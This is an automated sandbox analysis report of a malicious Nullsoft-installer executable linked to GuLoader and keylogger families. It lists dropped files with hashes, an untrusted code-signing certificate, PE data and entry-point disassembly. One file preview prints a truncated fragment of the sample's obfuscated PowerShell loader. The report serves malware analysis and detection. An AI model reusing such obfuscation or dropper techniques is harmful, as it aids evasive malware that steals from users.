                                                      Start date and time:2025-01-11 03:14:13 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 48s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Run name:Run with higher sleep bypass
                                                      Number of analysed new started processes analysed:7
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:ro7eoySJ9q.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423.exe
                                                      Detection:MAL
                                                      Classification:mal96.troj.evad.winEXE@6/15@2/2
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HCA Information:
                                                      • Successful, ratio: 96%
                                                      • Number of executed functions: 75
                                                      • Number of non-executed functions: 55
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 20.12.23.50
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37f463bf4616ecd445d4a1937da06e194NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      • 142.250.185.110
                                                      • 142.250.181.225
                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 142.250.185.110
                                                      • 142.250.181.225
                                                      YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.185.110
                                                      • 142.250.181.225
                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      • 142.250.185.110
                                                      • 142.250.181.225
                                                      4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.185.110
                                                      • 142.250.181.225
                                                      Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.185.110
                                                      • 142.250.181.225
                                                      TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 142.250.185.110
                                                      • 142.250.181.225
                                                      Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 142.250.185.110
                                                      • 142.250.181.225
                                                      WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      • 142.250.185.110
                                                      • 142.250.181.225

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):53158
                                                      Entropy (8bit):5.062687652912555
                                                      Encrypted:false
                                                      SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                      MD5:5D430F1344CE89737902AEC47C61C930
                                                      SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                      SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                      SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33caabcr.rfp.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42wnsz4t.j2r.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54nehgxc.pq0.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_inmnzshq.2um.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Detergenternes.bre

                                                      Download File
                                                      Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                      File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                      Category:dropped
                                                      Size (bytes):486421
                                                      Entropy (8bit):1.2470433609131586
                                                      Encrypted:false
                                                      SSDEEP:1536:p9ffEEX6My2RPkr6vyxsgBVdhrF8pGQkuxMSmLgnrL94:bffg2CJbdlFhh2Mwl4
                                                      MD5:858C7D246EC84B37359FDE23A9F8898A
                                                      SHA1:2046EFB2E9421F1F1C0CABA9F0D7ECCAD1F4AE0F
                                                      SHA-256:100C199A129F94FB16BDD51943FB691AB055CEA690088691C0F989D4C1C75884
                                                      SHA-512:547AA46E6279DD8DF920C2BF21B5A98B47F8B2F81E32FB36678119BC9510CA7D358C38C63E46E71285B76236D46D515CFE7C4DEA37660AE63E533AB78878ABBB
                                                      Malicious:false
                                                      Preview:......................................................................;.............................................................Do.......................................9.....................................................................................8...................T......................................................................................................................................k.............................................................{.(................c.............................).....s..................... ..................N.............q............2..............................................................................................c...................C..........................................G......................`.......|..............7.........0!..................p.........'..............)..........v.z.......................................................................................................[.s............~..A...+..

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis

                                                      Download File
                                                      Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (4311), with CRLF, LF line terminators
                                                      Category:dropped
                                                      Size (bytes):72400
                                                      Entropy (8bit):5.192574154183547
                                                      Encrypted:false
                                                      SSDEEP:1536:AGGe3wKH5jk6dqKN1hsYIOWl8/4noyXgRCopjLSz/1cqtssTzDyohZuK:ALgwKZjNdJN/IXlK4oyXMpja6Ypj/qK
                                                      MD5:FC1243B96424C77D582F495E7572027B
                                                      SHA1:21AF8B3AEAECBD754C5FE4F3B3FE84CF741AC9C4
                                                      SHA-256:2DB217565103029D09CF451F3FACECFF81BEA4D089D1BFE4CCF297B53E2F3CB7
                                                      SHA-512:E35C6DFE1699C9B4011E42A5EFD16F317E718101C7D8A81867B1E2951021BD4DAC0AC59B5AAA9E358E4CB0FA3F0A98C4F279A8B37A0DBFC5F031F9EE1DFEBB91
                                                      Malicious:false
                                                      Preview:$Temporresncubators=$Reheeling218rugerlisten;.....<#Iridectropium Flyswat Bronkoskoperingernes winnowing Stuehus Cleithral Phyllocyst #>..<#Axifugal Dekomprimeret Seismographer Opuscle Antimeson Spanskrrsstok #>..<#Beliggenheders Deceivance Luftgeners Dipodomyinae Diarrbe Krydstogters Fling #>..<#Backyarder Tronbestigning Reauthorises Selskabsproblemet Parforceridt Coughs Galliumoxid #>..<#Delmoments Essenism Olds Cabining Sjakformndenes #>..<#Regrupperingslejre Saddletrees Blokstrukturens aandsnrvrelse #>...$Disfavoured = @'.Hygrosc.Oenocyt$PartereRSchfereeenmarblhImpu.sfe.ilhvise RandrulSessioniBlueblanBarmhjeg Lame r2 calva 1overnot8u,troner .pinode RidmardTankefll J laparSu typer B terneBiophysd,ntibakeTelextjrFornyelsAnisses=Untugge$Holo laS,weethem obligarVinylflg Aabensa Pochera BilggesTidsangeMemoryfrRapunsln AjatsaeHenst.a;Mesocoe.Nystrgef VegetauMaenadinin grebc,egaenbtAntifediParlameocastigan,verthr lithuaTThetemph GangliaGaapaamnDesaminkValenhefAkvaplauHousemalThermoclAnn

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Smkkers.Noe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):315374
                                                      Entropy (8bit):7.718302595085237
                                                      Encrypted:false
                                                      SSDEEP:6144:k1gcaHtn8nWPiQWxAnN/iF14M4337pvwMXMbp2O3oL0z8QOT78wtPaB6:AgcS8nAnWxAtiF14rJMbwO3HrJwhaB6
                                                      MD5:B82937D4161F35374A360149D43614E7
                                                      SHA1:E42EADA7A06078688C363E341ADCE37237B510B3
                                                      SHA-256:DE1F8A1AE7BC242425197B7C5206A558543559A1BF5B5BFA5B4B11EC5CD4FBDF
                                                      SHA-512:90BA42E077A4F569143F935D07A263AF64966D382D4B9ADED1E462B6AE54F195DC07CE6FB67A96AEEF003B4DB13D99DEF1D84B686CC194FC985A56EA0A9999A8
                                                      Malicious:false
                                                      Preview:..7777.................o.......................................5555.........!.f...............rrr..........RRRR......99.................../......LL.........|............OO...............................................]...........PP.......a.........................RRR..""....................................|..............>......====.......D.....................s........3.......................).....................FF...llll...s..'''.\\\\.................. .....................5...rrr........_.\....................*... ..............................~~~~.........333.//.........N.....[[[[[[..._..$...~......#.........&...............JJ...............MMMMMM................ ........p........bb.....bbbbb.....................[....t.......f.''....m............ZZ...P..z.............WWW.................................]]]]]]].XXX......n....vvv..........%........... .............................]...........~~..tt...............////.......NNNNN...ggggg..............<<<<.....K.~.........p.....M..

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\brugerinstallation.cry

                                                      Download File
                                                      Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                      File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary
                                                      Category:dropped
                                                      Size (bytes):462783
                                                      Entropy (8bit):1.2514895750557933
                                                      Encrypted:false
                                                      SSDEEP:1536:gR0px6Iw5kvIV8FuWk8mGWwi1BoFIN8oYd:jmIwavC6utxgIjYd
                                                      MD5:77218C2134D28A666F2FDEAA5E452489
                                                      SHA1:16E2234D9C2F4E4265D1362887B40149B9E31823
                                                      SHA-256:A901A3525DC18A4A9E6EF655931252D8258D954D419FCE81668F251C8EF54EE5
                                                      SHA-512:AFE9F39C392A6DE29B551393CB032534D04AA18B82E747406A23828DE7B4088FBA3045F0DD8ECC37C3A4FE45125605C0504EA8A1C38DA429624A35753E8E3ED2
                                                      Malicious:false
                                                      Preview:....................]l................pq......................................................................................................p..........................................&...........................................................................].................v.................,.............................................................*.........................+........2.............................GI=..............,............................I............to....{........................8...........f..........XF.........O.............................................................].................-....................+........................2...........................B......................m.....^......................................................................................z....;.........x.....................................................................................................................4.............6...6............s.................

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\cloner.hol

                                                      Download File
                                                      Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):457562
                                                      Entropy (8bit):1.2482312628496608
                                                      Encrypted:false
                                                      SSDEEP:1536:2jMpNhAlrasgHvP3V5s9ASYucRtPbRS9y:hpNhX93V5sOSTczjB
                                                      MD5:E4AC954ED484155B2A165BF00B1E8A4F
                                                      SHA1:21ACBAC21538E0258892381807BBE19524DA02E3
                                                      SHA-256:3078C30C80C29C473A796C4E1FE5F89A175D9B23FC88DBCD0262D93B0C67BEED
                                                      SHA-512:A63E484A5CF926E2484B69210BE047B1F90DAC2A0F813E33D2F1B507CC45AF21169AEC9EBEAA6152CDB2448BEE7B09D82E4427C7596E864B09A7A15560D323AC
                                                      Malicious:false
                                                      Preview:.......v......... ....:...........r.........................V.......l...Z...^.....................q........................l.........d.c............................................................Y.........................7.....................................o.....................T.................................T...................................n..............................................................g.3......................................................o.....................................X..0.....................................................:..........................Z?..........................s........O........>.................._.................................P.................................................$.................M.....................1........-..............................................I...........(..............................................................m..............-................................................o.....................

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\hickishness.non

                                                      Download File
                                                      Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):327732
                                                      Entropy (8bit):1.2609335393847756
                                                      Encrypted:false
                                                      SSDEEP:768:rbmwczlydY1vPDT6+VOPnd7avS0bYT7bUkf0+VNt8xT70sob8aN/qfizqd71OFNj:sQdCVXhCo3Vxd/SRgV133ZBLlo
                                                      MD5:622032628F068FE10CC2E51D0502CC9A
                                                      SHA1:5AE897F10B51533C20489B755F4395FCED7EB67C
                                                      SHA-256:840F31C02A7A8CA755C4CD53619D9F93BB42848DD334B25A0A3C72B13F5753F4
                                                      SHA-512:2E5C98D7E3FE856D22381B2B97BAC5DF50C82859CB62DCF1D2FE3386B79D96446887FECB59D43F924200532399307E3846DDECA33FB87A286ADD5E6CEFC10637
                                                      Malicious:false
                                                      Preview:.).............\....................).....................q............A.....c..................................[..,........................(...................................................................}...................................................^................`.................................%.............................................................................L....................~d...............N..........................................h......~.............................~.........B...................Z....0..........................q................................v.......................................k............Y.............................................|..................................................................1.................T......................................................................................................................k........................................D...-.V..z...'........................................

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\hogni.opd

                                                      Download File
                                                      Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):433848
                                                      Entropy (8bit):1.255481788885247
                                                      Encrypted:false
                                                      SSDEEP:768:8agBmxdiio94Vue1rGruEhQHTvyGPHzfrm75zidpc8oUH392slzddIRzyP98UmYu:NgKjnn/NnW5hQAPAfMqoDH+bI
                                                      MD5:7586252625434A405256063977B84D0D
                                                      SHA1:BA800F4510A4940F6EA11F866E3F4AF9805BDFD4
                                                      SHA-256:5AFA5BC29281632F196999E16D8F4B26F2C14EC6A8A5F589DC5932B6DE78A2A7
                                                      SHA-512:613E03C6EC8DFBE0B2B6A450B30B932157FE40121E6A7E4AE9FB188193AB6E5D3CA044F30351A3E969FD84BAC8BC7AD2B7DD5E9D0BB091FEDE0546CC9E3A3856
                                                      Malicious:false
                                                      Preview:...............1.............L..................................................................3...............................m...............................................................................................y...........n.................A................G...........$............................m.........................X..............................................................................5.....G.............^....................................\........v.....................-......................................................."............................V........0....................G.........................................................................................................#.....B...............V.....................x............U......................T................................>.................w..............;.....................................L.....................................................................y,.................

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):1060792
                                                      Entropy (8bit):7.56576191182161
                                                      Encrypted:false
                                                      SSDEEP:24576:bj+EJoIVlLHDiemfwmNG3Ap137dboaPjyMi76Kbh:v+xIDXoIt3IRM+i76s
                                                      MD5:69C59075BC9FFD11BF75080CFE44F29E
                                                      SHA1:E1CB7F85EB9236FAD345BC1E3F941219CDF84EDC
                                                      SHA-256:EBDA1DB301F4E3E3500292B8C519298D577CB9908B94F106A3CBE8C83136A423
                                                      SHA-512:163C7AAD4458A5E9BED67D4B20EC2DC06011F249003BC68DB7F38C4E8B617F457D2C9E0C8838D2BF7F63170CDF3C10D430F29110C0BB8C491928808AEC3258B6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@..........................@.......................................................P...............&...............................................................................................text....`.......b.................. ..`.rdata..`............f..............@..@.data................|..............@....ndata.......P...........................rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\solvejg.non

                                                      Download File
                                                      Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):327124
                                                      Entropy (8bit):1.2472891497347776
                                                      Encrypted:false
                                                      SSDEEP:768:qw1bcEnP59OCTltLumdIdNK2mkVYYHN44jjU5S6EP1KRuM/VTCo0oXATL4bYZcOO:jucypY8Gyju3O4/iALDvWJTAnjPqqaO
                                                      MD5:0EC84A842970A2C0B04893F66217F733
                                                      SHA1:E100ACDACE598C27B00E0AF658306942A70228FC
                                                      SHA-256:6B3552FC5295BE3AE9FADD8AFA8A06103BD60DDB6E0BE924C61B346895505A7A
                                                      SHA-512:27270395859FEF2B270B7C2C70FA587BAF4FDCFF742DA93B6F7D1B0B82B5B1FF0BA9004BD3B825A9A62FAE75FB0F792A176ECE980529B61A2FEADE958B8B0BFB
                                                      Malicious:false
                                                      Preview:................:............................q......................[.................c.....................................{.... ..................................K....U............4.........................................@.........................................................\...............e...........................3................J.........L*....................................................................................(.......@..........................................................................g....................4.............................b.......2...............................p.....t.......................4\.................&......d...........................................................................................k......k........................................................................................................................................................................................\....................................0........M

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.56576191182161
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:ro7eoySJ9q.exe
                                                      File size:1'060'792 bytes
                                                      MD5:69c59075bc9ffd11bf75080cfe44f29e
                                                      SHA1:e1cb7f85eb9236fad345bc1e3f941219cdf84edc
                                                      SHA256:ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423
                                                      SHA512:163c7aad4458a5e9bed67d4b20ec2dc06011f249003bc68db7f38c4e8b617f457d2c9e0c8838d2bf7f63170cdf3c10d430f29110c0bb8c491928808aec3258b6
                                                      SSDEEP:24576:bj+EJoIVlLHDiemfwmNG3Ap137dboaPjyMi76Kbh:v+xIDXoIt3IRM+i76s
                                                      TLSH:B8352312B251D48EE4720632E95BE67D043ADF1CDD504A1727A43F9F397BA826C7428F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@

                                                      File Icon

                                                      Icon Hash:0d4f7fd151493b07

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4031dd
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x519965E1 [Sun May 19 23:53:05 2013 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:7fd61eafe142870d6d0380163804a642

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=Cadamba, O=Cadamba, L=Pagney, C=FR
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 24/06/2024 10:55:01 24/06/2027 10:55:01
                                                      Subject Chain
                                                      • CN=Cadamba, O=Cadamba, L=Pagney, C=FR
                                                      Version:3
                                                      Thumbprint MD5:A1DDD1E0B2FDEE711CFF6DC5EF151203
                                                      Thumbprint SHA-1:E1D495360FBCBEFE3EB73B2B05198778C4E351AA
                                                      Thumbprint SHA-256:7937613CCFB0CF0772387EDE47A346B0A09760A520BEF4DABB06C92C2294CB5B
                                                      Serial:3B493B0032D7E072710BAB5C19E1E82C545F1684

                                                      Entrypoint Preview

                                                      Instruction
                                                      sub esp, 000002D4h
                                                      push ebx
                                                      push ebp
                                                      push esi
                                                      push edi
                                                      push 00000020h
                                                      xor ebp, ebp
                                                      pop esi
                                                      mov dword ptr [esp+18h], ebp
                                                      mov dword ptr [esp+10h], 0040A2D8h
                                                      mov dword ptr [esp+14h], ebp
                                                      call dword ptr [00408034h]
                                                      push 00008001h
                                                      call dword ptr [00408134h]
                                                      push ebp
                                                      call dword ptr [004082ACh]
                                                      push 00000008h
                                                      mov dword ptr [00434F58h], eax
                                                      call 00007F5FDCD26F75h
                                                      mov dword ptr [00434EA4h], eax
                                                      push ebp
                                                      lea eax, dword ptr [esp+34h]
                                                      push 000002B4h
                                                      push eax
                                                      push ebp
                                                      push 0042B1B8h
                                                      call dword ptr [0040817Ch]
                                                      push 0040A2C0h
                                                      push 00433EA0h
                                                      call 00007F5FDCD26BE0h
                                                      call dword ptr [00408138h]
                                                      mov ebx, 0043F000h
                                                      push eax
                                                      push ebx
                                                      call 00007F5FDCD26BCEh
                                                      push ebp
                                                      call dword ptr [0040810Ch]
                                                      cmp word ptr [0043F000h], 0022h
                                                      mov dword ptr [00434EA0h], eax
                                                      mov eax, ebx
                                                      jne 00007F5FDCD240EAh
                                                      push 00000022h
                                                      mov eax, 0043F002h
                                                      pop esi
                                                      push esi
                                                      push eax
                                                      call 00007F5FDCD2663Ch
                                                      push eax
                                                      call dword ptr [00408240h]
                                                      mov dword ptr [esp+1Ch], eax
                                                      jmp 00007F5FDCD241A9h
                                                      push 00000020h
                                                      pop edx
                                                      cmp cx, dx
                                                      jne 00007F5FDCD240E9h
                                                      inc eax
                                                      inc eax
                                                      cmp word ptr [eax], dx
                                                      je 00007F5FDCD240DBh
                                                      add word ptr [eax], 0000h

                                                      Rich Headers

                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85a00xb4.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x2eba8.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1026d00x8e8
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x60100x6200c51ae685760de510818d22f29d66b8b0False0.6646603954081632data6.440168137798694IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
